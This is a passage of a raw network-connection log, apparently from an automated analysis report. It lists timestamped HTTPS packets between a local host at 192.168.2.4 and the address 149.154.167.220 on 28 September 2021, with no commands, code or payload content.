Sep 28, 2021 07:58:27.554615974 CEST	49807	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.554649115 CEST	49807	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.554828882 CEST	49810	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.554845095 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.631664038 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.636504889 CEST	49810	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.636539936 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.636918068 CEST	49810	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.636933088 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.794246912 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.798331022 CEST	443	49810	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.798635960 CEST	49810	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.800136089 CEST	49810	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.801578045 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.801619053 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.801791906 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.803659916 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.803672075 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.861254930 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.867855072 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.867889881 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.868055105 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:27.868065119 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.970897913 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.970990896 CEST	443	49811	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:27.973515034 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.697633982 CEST	49811	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.700561047 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.700611115 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.700714111 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.701987982 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.702013016 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.764791012 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.771260023 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.771296024 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.778559923 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.778589964 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.888712883 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.889909983 CEST	443	49812	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.890045881 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.891522884 CEST	49812	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.896058083 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.896097898 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:28.897656918 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.898273945 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:28.898286104 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.004908085 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.010272026 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.010298014 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.020639896 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.020669937 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.140106916 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.140196085 CEST	443	49813	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.140333891 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.143781900 CEST	49813	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.162986994 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.163037062 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.163232088 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.179872036 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.181197882 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.328978062 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.333877087 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.333899021 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.334000111 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.334009886 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.486021996 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.487641096 CEST	443	49814	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.490346909 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.490394115 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.492388010 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.492399931 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.492404938 CEST	49814	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.492441893 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.493980885 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.563216925 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.569061041 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.569134951 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.572113991 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.575155973 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.673995018 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.674076080 CEST	443	49815	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.679449081 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.679478884 CEST	49815	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.684058905 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.684098959 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.685543060 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.685575962 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.685585022 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.750507116 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.755332947 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.755356073 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.756248951 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.756263018 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.874192953 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.874512911 CEST	443	49816	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.874794006 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.875726938 CEST	49816	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.922667980 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.922714949 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:29.926887035 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.926932096 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:29.926940918 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.013859987 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.063621044 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.067924976 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.067944050 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.068051100 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.068061113 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.235394955 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.235466957 CEST	443	49817	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.235619068 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.251842022 CEST	49817	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.253592014 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.253619909 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.253691912 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.254230976 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.254240990 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.309835911 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.319259882 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.319276094 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.319534063 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.319539070 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.416977882 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.417057037 CEST	443	49818	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.417327881 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.418421030 CEST	49818	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.420053959 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.420084953 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.420237064 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.420844078 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.420851946 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.497299910 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.502160072 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.502197981 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.507164955 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.507193089 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.673424006 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.673557997 CEST	443	49819	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.673652887 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.674714088 CEST	49819	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.676541090 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.676589012 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.683970928 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.684011936 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.684021950 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.760029078 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.771253109 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.771279097 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.773945093 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.773968935 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.897723913 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.902853012 CEST	443	49820	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.903954029 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.903971910 CEST	49820	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.905077934 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.905112028 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.908248901 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.908271074 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.908277988 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.976579905 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.990011930 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.990046024 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:30.990223885 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:30.990232944 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.124598980 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.124674082 CEST	443	49821	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.124737978 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.125941992 CEST	49821	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.128285885 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.128340006 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.129738092 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.129772902 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.129782915 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.200458050 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.254012108 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.745749950 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.745778084 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.747260094 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.747278929 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.904196024 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.905411959 CEST	443	49822	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.908699989 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.908734083 CEST	49822	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.913042068 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.913100004 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.913254023 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.913836956 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.913852930 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.987468958 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.991344929 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.991368055 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:31.995466948 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:31.995493889 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.131273985 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.133655071 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.144679070 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.149413109 CEST	443	49823	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.150077105 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.150168896 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.150197983 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.150206089 CEST	49823	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.157048941 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.157108068 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.157118082 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.304565907 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.315973997 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.316018105 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.316246033 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.316267967 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.418612957 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.418698072 CEST	443	49824	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.426551104 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.426589012 CEST	49824	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.426781893 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.426948071 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.429296970 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.429337025 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.429363966 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.505848885 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.520143032 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.520184040 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.520261049 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.520276070 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.628245115 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.632980108 CEST	443	49825	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.633104086 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.912592888 CEST	49825	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.913125038 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.913168907 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.924175024 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.924222946 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:32.924238920 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:32.993364096 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.001488924 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.001506090 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.003479958 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.003495932 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.160440922 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.160634995 CEST	443	49826	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.161791086 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.271831989 CEST	49826	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.274096966 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.274177074 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.274717093 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.274894953 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.274907112 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.334100962 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.338099003 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.338125944 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.338296890 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.338308096 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.464440107 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.464533091 CEST	443	49827	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.464601040 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.465660095 CEST	49827	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.467508078 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.467570066 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.467684031 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.468334913 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.468353033 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.524816990 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.527992964 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.528017044 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.528115988 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.528125048 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.653726101 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.653819084 CEST	443	49828	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.653892994 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.685075998 CEST	49828	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.693948984 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.693993092 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.694070101 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.694595098 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.694611073 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.751528025 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.755788088 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.755811930 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.755985022 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.755995989 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.872786045 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.872889996 CEST	443	49829	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.872952938 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.874063969 CEST	49829	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.876111984 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.876163960 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.876254082 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.876868010 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.876888037 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.934278965 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.937175989 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.937230110 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:33.937309980 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:33.937323093 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.096031904 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.096117973 CEST	443	49830	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.096196890 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.097250938 CEST	49830	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.099081039 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.099148035 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.099255085 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.108994007 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.109021902 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.170053005 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.176858902 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.176891088 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.181660891 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.181689024 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.290105104 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.290174007 CEST	443	49831	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.290364027 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.291719913 CEST	49831	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.293656111 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.293687105 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.293812037 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.294251919 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.294264078 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.351027966 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.354100943 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.354118109 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.354274988 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.354279995 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.454803944 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.454873085 CEST	443	49832	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.454986095 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.455998898 CEST	49832	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.457845926 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.457876921 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.457963943 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.458362103 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.458375931 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.514746904 CEST	443	49833	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:34.518419027 CEST	49833	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:34.518431902 CEST	443	49833	149.154.167.220	192.168.2.4
